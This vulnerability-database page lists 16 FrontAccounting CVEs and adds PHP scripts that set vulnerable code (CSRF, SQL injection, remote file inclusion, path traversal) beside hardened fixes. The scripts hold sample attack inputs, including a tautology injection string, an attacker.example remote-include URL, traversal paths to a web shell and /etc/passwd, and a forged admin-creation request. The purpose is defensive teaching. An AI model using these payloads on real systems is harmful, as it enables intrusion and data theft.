FrontAccounting vulnerabilities
16 known vulnerabilities affecting frontaccounting/frontaccounting.
Total CVEs: 16
CISA KEV: 0
Public exploits: 3
Exploited in wild: 0
Severity breakdown: CRITICAL 2, HIGH 11, MEDIUM 3
Vulnerabilities
CVE-2007-4279 | HIGH | CVSS 7.5 | priority P2 | public PoC | affects v1.12_build_31 | published 2007-08-09
PHP remote file inclusion vulnerability in config.php in FrontAccounting 1.12 Build 31 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_root parameter.
Source: NVD
CVE-2018-7176 | HIGH | CWE-352 | CVSS 8.8 | priority P3 | public PoC | affects v2.4.3 | published 2018-02-16
FrontAccounting 2.4.3 suffers from a CSRF flaw, which leads to adding a user account via admin/users.php (aka the "add user" feature of the User Permissions page).
Source: NVD
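The admin/users.php flaw above is the textbook outcome of a state-changing POST handler that is gated only by the session cookie the browser attaches automatically. The script below is an added example, not FrontAccounting's own code: the same add-user handler with and without a per-session synchroniser token. The field names, the $users store and the $session array (which stands in for $_SESSION so the script runs from the CLI) are assumptions made for the demonstration.

```php
<?php
// Added example, not FrontAccounting code. Field names, the $session array
// (stands in for $_SESSION so this runs from the CLI) and $users are invented.

// Issue one random token per session; the real form would embed it as a hidden field.
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// VULNERABLE: only the automatically attached session cookie gates the action,
// so a form on any other origin that posts these field names creates the account.
function add_user_vulnerable(array $post, array &$users): bool
{
    if (!isset($post['user_id'], $post['password'])) {
        return false;
    }
    $users[$post['user_id']] = [
        'role'     => $post['role'] ?? 'user',
        'pwd_hash' => password_hash($post['password'], PASSWORD_DEFAULT),
    ];
    return true;
}

// HARDENED: the request must also carry the session's token, which a page on
// another origin cannot read. hash_equals() keeps the comparison constant-time.
function add_user_safe(array $post, array &$session, array &$users): bool
{
    $expected = $session['csrf_token'] ?? '';
    $sent     = (string) ($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {
        return false;
    }
    return add_user_vulnerable($post, $users);
}

// Demonstration with constructed requests.
$session = [];
$token   = issue_csrf_token($session);
$users   = [];

// A forged cross-site POST carries the victim's cookie but not the token.
$forged = ['user_id' => 'attacker', 'password' => 'Passw0rd!', 'role' => 'admin'];
var_dump(add_user_vulnerable($forged, $users));
var_dump(add_user_safe($forged, $session, $users));

// The genuine same-origin form includes the token.
$genuine = $forged + ['csrf_token' => $token];
var_dump(add_user_safe($genuine, $session, $users));
```

Run from the CLI, the vulnerable handler accepts the forged request and the hardened one refuses it, while the request that includes the token is accepted. The token is tied to the session rather than to a single form so that multiple open tabs keep working; if per-form tokens are preferred, store a list and remove each on use. A SameSite=Lax or Strict cookie attribute is a useful second layer but does not replace the token, since older clients and some cross-site navigations still send cookies.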
CVE-2007-5117 | CRITICAL | CVSS 9.3 | priority P3 | public PoC | affects v1.13 | published 2007-09-27
Multiple PHP remote file inclusion vulnerabilities in FrontAccounting (FA) 1.13, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the path_to_root parameter to (1) access/login.php and (2) includes/lang/language.php, different vectors than CVE-2007-4279.
Source: NVD
CVE-2026-40521 | HIGH | CWE-22 | CVSS 8.8 | priority P2 | fixed in 2.4.20 | published 2026-06-29
FrontAccounting before 2.4.20 contains a path traversal vulnerability in the attachment upload handler that allows authenticated attackers to execute arbitrary code by uploading files with traversal sequences in the unique_name parameter. Attackers can supply path traversal sequences ../../../shell.php to write files outside the intended attachments di
Source: NVD
CVE-2026-40524 | HIGH | CWE-89 | CVSS 8.1 | priority P3 | fixed in 2.4.20 | published 2026-06-29
FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the get_gl_transactions() function where the filter_type parameter is concatenated directly into a SQL IN() clause without parameterization. Attackers with SA_GLANALYTIC permission can inject arbitrary SQL by supplying a closing parenthesis followed by malicious conditions to extra
Source: NVD
CVE-2026-40523 | HIGH | CWE-89 | CVSS 8.1 | priority P3 | fixed in 2.4.20 | published 2026-06-29
FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the Audit Trail report handler that allows authenticated attackers with SA_GLANALYTIC permission to execute arbitrary SQL queries by injecting malicious code into the PARAM_2 and PARAM_3 POST parameters. Attackers can exploit time-based blind SQL injection through SLEEP() functions
Source: NVD
CVE-2019-5720 | CRITICAL | CWE-89 | CVSS 9.8 | priority P3 | affects v2.4.6 | published 2019-01-08
includes/db/class.reflines_db.inc in FrontAccounting 2.4.6 contains a SQL Injection vulnerability in the reference field that can allow the attacker to grab the entire database of the application via the void_transaction.php filterType parameter.
Source: NVD
CVE-2018-1000890 | HIGH | CWE-89 | CVSS 7.5 | priority P3 | affects v2.4.5 | published 2018-12-28
FrontAccounting 2.4.5 contains a Time Based Blind SQL Injection vulnerability in the parameter "filterType" in /attachments.php that can allow the attacker to grab the entire database of the application.
Source: NVD
CVE-2026-40522 | HIGH | CWE-89 | CVSS 7.1 | priority P3 | fixed in 2.4.20 | published 2026-06-29
FrontAccounting before 2.4.20 contains a SQL injection vulnerability in the Bank Statement report handler that allows authenticated attackers to extract arbitrary database data by injecting UNION SELECT payloads into the PARAM_0 POST parameter. Attackers can supply malicious SQL syntax through the unparameterized WHERE clause to retrieve sensitive info
Source: NVD
CVE-2014-3973 | HIGH | CWE-89 | CVSS 7.5 | priority P3 | affects ≤ 2.3.20 (v2.3 and 20 more versions listed) | published 2014-06-05
Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.3.21 allow remote attackers to execute arbitrary SQL commands via unspecified vectors.
Source: NVD
CVE-2009-4037 | HIGH | CWE-89 | CVSS 7.5 | priority P3 | affects ≤ 2.1.6 (v2.0 and 15 more versions listed) | published 2009-11-20
Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.1.7, and 2.2.x before 2.2 RC, allow remote attackers to execute arbitrary SQL commands via unspecified parameters to (1) admin/db/users_db.inc, and various other .inc and .php files under (2) admin/, (3) dimensions/, (4) gl/, (5) inventory/, (6) manufacturing/, and (7) purchasing/.
Source: NVD
CVE-2009-4045 | HIGH | CWE-89 | CVSS 7.5 | priority P3 | affects ≤ 2.1.6 (v2.0 and 14 more versions listed) | published 2009-11-20
Multiple SQL injection vulnerabilities in FrontAccounting (FA) before 2.1.7 allow remote attackers to execute arbitrary SQL commands via unspecified parameters to various .inc and .php files in (1) reporting/, (2) sales/, (3) sales/includes/, (4) sales/includes/db/, (5) sales/inquiry/, (6) sales/manage/, (7) sales/view/, (8) taxes/, and (9) taxes/db/.
Source: NVD
CVE-2009-4046 | HIGH | CWE-89 | CVSS 7.5 | priority P3 | affects v2.2 | published 2009-11-20
Multiple SQL injection vulnerabilities in FrontAccounting (FA) 2.2.x before 2.2 RC allow remote attackers to execute arbitrary SQL commands via unspecified parameters to (1) bank_accounts.php, (2) currencies.php, (3) exchange_rates.php, (4) gl_account_types.php, and (5) gl_accounts.php in gl/manage/; and (6) audit_trail_db.inc, (7) comments_db.inc, (8) i
Source: NVD
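Nine of the sixteen entries are SQL injection, and the CVE-2026-40524 description gives the clearest picture of the root cause: a request value concatenated into an IN() list so that a closing parenthesis rewrites the WHERE clause. The same pattern, with a string rather than a list, is behind the PARAM_0/PARAM_2/PARAM_3 report-handler entries (CVE-2026-40522, CVE-2026-40523) and the filterType entries (CVE-2019-5720, CVE-2018-1000890). The script below is an added example and not FrontAccounting's code: the vulnerable concatenation beside a version that validates each element and binds it to its own placeholder. The table, column and function names are invented, and an in-memory SQLite database through PDO stands in for the MySQL backend so the script runs anywhere pdo_sqlite is present.

```php
<?php
// Added example, not FrontAccounting code. Table, column and function names are
// invented; an in-memory SQLite database via PDO stands in for the MySQL backend
// so the script runs anywhere pdo_sqlite is available.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE gl_trans (id INTEGER PRIMARY KEY, type INTEGER, amount REAL)');
    $db->exec('INSERT INTO gl_trans (type, amount) VALUES (0, 10.0), (1, 20.0), (2, 30.0), (4, 40.0)');
    return $db;
}

// VULNERABLE: the comma-separated filter goes straight into the IN() list, so a
// value that closes the parenthesis rewrites the rest of the WHERE clause.
function get_gl_transactions_vulnerable(PDO $db, string $filter_type): array
{
    $sql = "SELECT id, type, amount FROM gl_trans WHERE type IN ($filter_type)";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: split the list, require every element to be a plain integer, and
// bind each one to its own placeholder. The SQL text now has a fixed shape; only
// the number of placeholders varies, and that number is computed server-side.
function get_gl_transactions_safe(PDO $db, string $filter_type): array
{
    $types = array_map('trim', explode(',', $filter_type));
    foreach ($types as $t) {
        if (preg_match('/^[0-9]+$/', $t) !== 1) {
            throw new InvalidArgumentException("non-numeric type filter: '$t'");
        }
    }
    $placeholders = implode(',', array_fill(0, count($types), '?'));
    $stmt = $db->prepare("SELECT id, type, amount FROM gl_trans WHERE type IN ($placeholders)");
    $stmt->execute(array_map('intval', $types));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = make_db();

// A legitimate filter for types 0 and 1 behaves the same in both versions.
printf("legit '0,1'  vulnerable: %d rows, safe: %d rows\n",
    count(get_gl_transactions_vulnerable($db, '0,1')),
    count(get_gl_transactions_safe($db, '0,1')));

// Attacker value: close the IN() list, append a tautology, comment out the rest.
$payload = '0) OR 1=1 --';
printf("payload '%s'  vulnerable: %d rows (the whole table)\n",
    $payload, count(get_gl_transactions_vulnerable($db, $payload)));
try {
    get_gl_transactions_safe($db, $payload);
} catch (InvalidArgumentException $e) {
    printf("payload '%s'  safe: rejected (%s)\n", $payload, $e->getMessage());
}
```

Two points for anyone patching similar code. First, an allow-list of permitted values (here, digits only) is a useful pre-check but is not the fix on its own; the placeholders are what keep data out of the query grammar, so keep both. Second, the time-based blind variant mentioned for CVE-2026-40523 is detectable in web logs and WAF telemetry by SLEEP() or BENCHMARK() strings in POST bodies to the report endpoints together with response times that jump to the requested delay; a handler that only ever binds parameters returns no such signal because the payload is compared as a literal.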
CVE-2007-5148 | MEDIUM | CVSS 6.8 | priority P4 | affects v1.12 | published 2007-10-01
Multiple PHP remote file inclusion vulnerabilities in FrontAccounting (FA) 1.12 allow remote attackers to execute arbitrary PHP code via a URL in the path_to_root parameter to (1) access/logout.php or certain PHP scripts under (2) admin/, (3) dimensions/, (4) gl/, (5) inventory/, (6) manufacturing/, (7) purchasing/, (8) reporting/, (9) sales/, or (10) taxes/.
Source: NVD
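The three remote file inclusion entries (CVE-2007-4279, CVE-2007-5117 and CVE-2007-5148) share one cause: scripts that build include paths from $path_to_root but, when requested directly rather than through a parent page, never assign it, so with register_globals=On the query string supplies the value. The script below is an added illustration and not FrontAccounting's code. It shows the vulnerable pattern beside a resolver that derives the root from the file's own location and refuses anything that resolves outside it. The file names and the emulate_register_globals() helper are assumptions for the demonstration.

```php
<?php
// Added example, not FrontAccounting code. The file names and the
// emulate_register_globals() helper are invented for the demonstration.

// Stand-in for register_globals=On (PHP < 5.4), which copied every request
// parameter into a global variable of the same name before the script ran.
function emulate_register_globals(array $request): void
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// VULNERABLE: the script relies on $path_to_root having been set by whichever
// page included it. Requested directly with register_globals on, the request
// sets it instead, and with allow_url_include on the include fetches remote code.
function vulnerable_include_target(): string
{
    global $path_to_root;
    return $path_to_root . '/includes/session.inc';
}

// HARDENED: the root is derived from this file's own location, never from a
// variable the request can reach, and the resolved target must stay under it.
function hardened_include_target(string $relative): string
{
    $root   = realpath(__DIR__);
    $target = realpath($root . '/' . $relative);
    if ($target === false
        || strncmp($target, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        throw new RuntimeException("refusing include outside $root: $relative");
    }
    return $target;
}

// Demonstration with a constructed request: ?path_to_root=http://attacker.example/x
emulate_register_globals(['path_to_root' => 'http://attacker.example/x']);
echo 'vulnerable: ', vulnerable_include_target(), PHP_EOL;

// The hardened resolver ignores the request entirely. A file that exists under
// the root (this script itself) is accepted; a traversal out of it is refused.
foreach ([basename(__FILE__), '../../../../etc/passwd'] as $relative) {
    try {
        echo 'hardened:   ', hardened_include_target($relative), PHP_EOL;
    } catch (RuntimeException $e) {
        echo 'hardened:   ', $e->getMessage(), PHP_EOL;
    }
}
```

The vulnerable function returns an http:// target assembled from the request, which is exactly what include() would then try to fetch. The platform-level mitigations are worth stating alongside the code fix: register_globals was deprecated in PHP 5.3 and removed in 5.4, and allow_url_include has defaulted to Off since 5.2, so the RFI variant is unreachable on current runtimes even where the coding pattern survives. Note that realpath() returns false for a path that does not exist, which the hardened resolver treats as a refusal; that is the right default for an include path, which should always exist.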
CVE-2020-21244 | MEDIUM | CWE-22 | CVSS 4.9 | priority P4 | affects v2.4.7 | published 2020-09-30
An issue was discovered in FrontAccounting 2.4.7. There is a Directory Traversal vulnerability that can empty a folder via admin/inst_lang.php.
Source: NVD
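Both CWE-22 entries (CVE-2026-40521 in the attachment upload handler and CVE-2020-21244 in admin/inst_lang.php) come from joining a client-controlled name onto a fixed directory. The script below is an added example and not FrontAccounting's code. It shows the unsafe join beside a version that never lets the client pick the stored name, and a lexical containment check that works for paths that do not exist yet (so it can be applied before the file is written, where realpath() cannot). The directory, parameter and function names are invented for the demonstration and nothing is written to disk.

```php
<?php
// Added example, not FrontAccounting code. The directory, parameter and
// function names are invented for the demonstration; nothing is written to disk.

const ATTACHMENTS_DIR = '/var/www/fa/company/0/attachments';

// Purely lexical normalisation (no realpath(), so it works for paths that do
// not exist yet): collapses "." and ".." segments and duplicate slashes.
function normalize_path(string $path): string
{
    $parts = [];
    foreach (explode('/', str_replace('\\', '/', $path)) as $seg) {
        if ($seg === '' || $seg === '.') {
            continue;
        }
        if ($seg === '..') {
            array_pop($parts);
            continue;
        }
        $parts[] = $seg;
    }
    return '/' . implode('/', $parts);
}

// True only if $candidate, once normalised, lies strictly below $root.
function is_inside(string $root, string $candidate): bool
{
    $root = rtrim(normalize_path($root), '/');
    $cand = normalize_path($candidate);
    return strncmp($cand, $root . '/', strlen($root) + 1) === 0;
}

// VULNERABLE: the client-chosen name is joined onto the directory unchanged, so
// "../../../shell.php" resolves to /var/www/fa/shell.php, under the web root.
function attachment_path_vulnerable(string $unique_name): string
{
    return ATTACHMENTS_DIR . '/' . $unique_name;
}

// HARDENED: the client never chooses the stored name. Only the extension is
// taken from the upload, checked against an allow-list, and the name itself is
// random. The containment check stays as defence in depth.
function attachment_path_safe(string $original_name): string
{
    $allowed = ['pdf', 'png', 'jpg', 'jpeg', 'txt', 'csv'];
    $ext = strtolower(pathinfo(basename($original_name), PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        throw new InvalidArgumentException("disallowed extension: '$ext'");
    }
    $path = ATTACHMENTS_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!is_inside(ATTACHMENTS_DIR, $path)) {
        throw new RuntimeException('path escapes attachments directory');
    }
    return $path;
}

// Demonstration with constructed input.
foreach (['invoice.pdf', '../../../shell.php'] as $name) {
    $p = attachment_path_vulnerable($name);
    printf("%-22s vulnerable => %s (inside: %s)\n", $name, normalize_path($p),
        is_inside(ATTACHMENTS_DIR, $p) ? 'yes' : 'no');
    try {
        printf("%-22s hardened   => %s\n", $name, attachment_path_safe($name));
    } catch (InvalidArgumentException | RuntimeException $e) {
        printf("%-22s hardened   => rejected: %s\n", $name, $e->getMessage());
    }
}
```

For the traversal payload, normalize_path() shows the file landing in /var/www/fa, and is_inside() reports it as outside the attachments directory; the hardened path rejects it on the extension before any path is built. Generating the stored name server-side also closes the double-extension trick (shell.php.pdf) against servers whose PHP handler matches any .php segment, because the stored name contains only the vetted extension. Embedded NUL bytes, once used to truncate paths, cause PHP 8 filesystem functions to throw, so they no longer need special handling here, but the allow-list and random name cost nothing and do not depend on runtime version.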
CVE-2011-3740 | MEDIUM | CWE-200 | CVSS 5.0 | priority P4 | affects v2.3.1 | published 2011-09-23
FrontAccounting 2.3.1 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by reporting/includes/fpdi/fpdi2tcpdf_bridge.php and certain other files.
Source: NVD